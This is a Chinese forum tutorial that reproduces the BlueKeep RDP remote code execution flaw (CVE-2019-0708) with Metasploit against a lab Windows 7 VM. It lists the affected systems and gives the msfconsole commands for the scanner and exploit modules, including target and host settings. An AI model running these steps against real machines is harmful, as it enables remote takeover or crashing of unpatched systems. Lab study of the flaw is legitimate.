请选择 进入手机版 | 继续访问电脑版
设为首页收藏本站 今天是: 2021-04-17    美好的一天,从现在开始
开启辅助访问      
切换到窄版

Waylee黑技术

 找回密码
 注册会员
搜索
热搜: 天龙 运维 kali
查看: 199|回复: 0
收起左侧

Metasploit之CVE-2019-0708远程执行代码漏洞利用过程

[复制链接]

293

主题

334

帖子

1412

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
1412
发表于 2021-4-3 20:44:57 | 显示全部楼层 |阅读模式
0.漏洞背景
Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。

1.影响范围
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
————————————————
2.复现操作2.0 提前准备好一个没有打补丁的win7系统(虚拟机和物理机都可以,推荐虚拟机,不要使用自己拿下的服务器,蓝屏后果无法预测)2.2 打开msf,并搜索0708

msfconsole
search 0708
2.3 使用扫描模块(scanner)
use  auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set rhost 192.168.237.131 //这里的ip填写自己win7主机的ip
run

2.4 进行利用
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show targets //选择目标主机类型  这里我选择了7601 -vmware 15
set target 4
set rhost 192.168.237.131
run



高级模式
您需要登录后才可以回帖 登录 | 注册会员

本版积分规则

为兴趣而生,注册一起交流。 立即登录云玩 立即注册

QQ|手机版|Waylee黑技术 ( 浙ICP备15015590号-1 )

|浙公网安备33048102000118号

GMT+8, 2021-4-17 12:37 , Processed in 0.094443 second(s), 26 queries .

Powered by Discuz! X3.4 Licensed

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表